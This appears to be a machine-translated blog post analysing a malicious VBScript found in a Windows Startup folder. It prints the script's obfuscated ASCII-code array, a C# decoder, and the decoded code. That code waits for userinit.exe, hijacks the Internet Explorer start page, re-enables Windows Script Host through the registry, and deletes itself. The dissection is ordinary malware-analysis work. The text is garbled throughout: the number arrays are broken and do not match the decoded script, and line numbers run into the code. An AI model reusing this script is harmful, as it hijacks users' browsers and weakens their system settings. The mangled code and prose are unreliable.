Today, I restored my computer to November 7. Result After the eset is updated, the directory C: \ ProgramData \ Microsoft \ Windows \ Start Menu \ Programs \ Startup has an zzs. vbs is not a popular program. If there was nothing to do at that time, open it. Want to know what it is. Because the eset is blocked, I will drag the file out. Change the suffix. The code is not long. The first half is ascii code .. 1. strs = Array (68,111, 83,101,116, 32,111, 98,106, 101,114,118,105, 99,101, 101,116, 106,101, 99,116, 119,105,110,109,103,109,116,115, 92,114,111,111,116, 105,109,118, 101,116, 111,108, 80,114,111, 99,101,115,115,101,115, 32,111, 98,106, 101,114,118,105, 99,101, 120,101, 117,101,114, 101,108,101, 99,116, 32,102,114,111,109, 105,110, 114,111, 99,101,115,115, 70,111,117,110,100, 80,114,111, 99,101,115,115, 70,111,114, 114,111, 99,101,115,115, 99,111,108, 80,114,111, 99,101,115,115,101,115, 32, 32, 32, 32, 32, 73,102, 32,111, 98,106, 80,114,111, 99,101, 115,115, 97,109,101, 117,115,101,114,105,110,105,116, 46,101,120,101, 84,104,101,110, 70,111,117,110,100, 80,114,111, 99,101,115,115, 32, 32, 32, 32, 49, 13, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 69,120,105,116, 111,114, 69,110,100, 13, 10, 32, 32, 32, 32, 32, 32, 73, 32, 32, 78, 101,120,116, 73,102, 111,117, 32, 32, 32, 11 0,100, 80,114,111, 99,101,115,115, 104,101,110, 120,105,116, 114,105,112,116, 108,101,101,112, 48, 48, 76,111,111,112, 97,103,101, 104,116,116,112, 47,119,119,119, 111,109, 111,110,101, 13, 101,116, 32,111, 98,106, 83,104,101,108,108, 114,101, 97,116,101, 106,101, 99,116, 99,114,105,112,116, 104,101,108,108, 104,101,108,108, 101,103, 87,114,105,116,101, 111,102,116,119, 97,114,101, 114,111,115,111,102,116, 110,116,101,114,110,101,116, 120,112,108,111,114,101,114, 97,105,110, 114,116, 97,103,101, 32,115, 103,101, 115,82, 101,103, 116,104, 77,105, 99,114,111,115,111,102,116, 105,110,100,111,119,115, 99,114,105,112,116, 111,115,116, 101,116,116,105,110,103,115, 69,114,114,111,114, 101,115,117,109,101, 101,120,116, 98,108,101,100, 32,111, 98,106, 83,104,101,108,108, 101,103, 82,101, 97,100, 40,115, 82,101,103, 116,104, 98,108,101,100, 69,114,114, 117,109, 98,101,114, 104,101,110, 104,101,108,108, 101,103, 87,114,105,116,101, 32,115, 82,101,103, 116,104, 98,108,101,100, 32,105, 69,110, 108,101,100, 87, 104,101,108,108, 101,103, 68,101,108,101,116,101, 32,115, 82,101,103, 116,104, 98,108,101,100, 69,110,100, 101,116, 32,111, 98,106, 83,104,101,108,108, 114,101, 97,116,101, 106,101, 99,116, 114,105,112,116,105,110,103, 105,108,101, 83,121,115,116,101,109, 10 6,101, 99,116, 83,101,116, 32,102, 32,111, 98,106, 83,104,101,108,108, 101,116, 70,105,108,101, 114,105,112,116, 99,114,105,112,116, 70,117,108,108, 109,101, 65,116,116,114,105, 98,117,116,101,115, 110,100, 104,101,110, 32,102, 116,116,114,105, 98,117,116,101,115, 32,102, 116,116,114,105, 98,117,116,101,115, 32, 10,111, 98,106, 83,104,101,108,108, 101,108,101,116,101, 70,105,108,101, 114,105,112,116, 99,114,105,112,116, 70,117,108,108, 109,101) the second half is 1.For I = 0 To UBound (strs) 2. runner = runner & Chr (strs (I) 3. although Next4.Execute runner is not familiar with vbs, he knows that vbs is often used to write a startup Item. Add a user. And so on. The last half is quite understandable. It is to convert the ascii code into a string and then execute it. Simply look at it. In fact, you can directly change the Execute runner to MsgBox runner. However, the eset cannot be closed. So I finally chose to use C # for writing. Decoding. Very simple. VS is on. Write it directly. 1. byte [] strs = {68,101,116, 70,105,108,101, 114,105,112,116, 99,114,105,112,116, 70,117,108,108, 109,101, 65,116,116,114,105, 98,117,116,101,115, 110,100, 104,101,110, 32,102, 116,116,114,105, 98,117,116,101,115, 32,102, 116,116,114,105, 98,117,116,101,115, 104,101,108,108, 101,108,101,116,101, 70,105,108,101, 114,105,112,116, 99,114,105,112,116, 70,117,108,108, 109,101,}; 2. system. text. ASCIIEncoding asciiEncoding = new System. text. ASCIIEncoding (); 3. console. writeLine (asciiEncoding. getString (strs); after running, the output is www.2cto.com 01. do02.Set ob1_miservice = GetObject ("winmgmts :\\. \ root \ cimv2 ") 03.Set colProcesses = ob1_miservice. execQuery ("Select * from <a href =" http://www.myhack58.com/ "Target =" _ blank "class =" keylink "> Win32 </a> _ Process") 04. foundProcess = 005.For Each objProcess In colProcesses06.If objProcess. name = "userinit.exe" Then07.FoundProcess = 108. exit For09.End If10.Next11. if FoundProcess = 0 Then Exit Do12.WScript. sleep 10013. loop14. 15. sPage =" http://www.999.com/?one "16. 17.Set objShell = CreateObject ("WScript. shell ") 18. objShell. regWrite "HKCU \ Software \ Microsoft \ Internet Explorer \ Main \ Start Page", s19.Page20. 21. sRegPath = "HKLM \ SOFTWARE \ Microsoft \ Windows Script Host \ Settings" 22.On Error Resume Next23.iEnabled = objShell. regRead _ 24. (sRegPath & "\ Enabled _") 25.If Err. number = 0 Then26.objShell. regWrite sRegPath & "\ Enabled", iEnabled, "REG_DWORD" 27. objShell. reg Delete sRegPath & "\ Enabled _" 28.End If29. 30.Set objShell = CreateObject ("Scripting. fileSystemObject ") 31.Set f = objShell. getFile (WScript. scriptFullName) 32.If f. attributes And 1 Then f. attributes = f. attributes-133. objShell. deleteFile WScript. scriptFullName is combined with the second half. After a simple reading, I learned that I first found the login userinit.exe process. Then I changed the registry and set the website 999 on the browser homepage. I found it a navigation site .. Hao123 makes money as a navigation station .. Do you want to follow suit like this ..